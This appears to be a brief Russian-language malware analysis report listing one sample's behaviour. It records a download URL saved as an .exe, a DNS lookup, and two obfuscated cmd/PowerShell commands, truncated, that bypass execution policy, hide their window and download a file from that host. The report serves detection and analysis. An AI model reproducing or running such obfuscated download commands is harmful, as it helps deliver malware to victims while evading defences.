Техническая информация
- http://www.fopeioaas.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POW^er^sHElL.exe ^-E^x^EcuT^ion^p^O^LIc^y ByP^A^SS -^N^oprO^F^ilE^ -^wiNd^OwsT^ylE ^h^ID^de^n ^(NEw-OBJ^e^Ct ^Sy^steM.N^E^t.^W^ebCl^i^EN^t).DO^wNloA^d^fILe(^'http://www.fopei...
- DNS ASK fo###oaas.top
- '<SYSTEM32>\cmd.exe' /C "POW^er^sHElL.exe ^-E^x^EcuT^ion^p^O^LIc^y ByP^A^SS -^N^oprO^F^ilE^ -^wiNd^OwsT^ylE ^h^ID^de^n ^(NEw-OBJ^e^Ct ^Sy^steM.N^E^t.^W^ebCl^i^EN^t).DO^wNloA^d^fILe(^'http://www.fopei...' (со скрытым окном)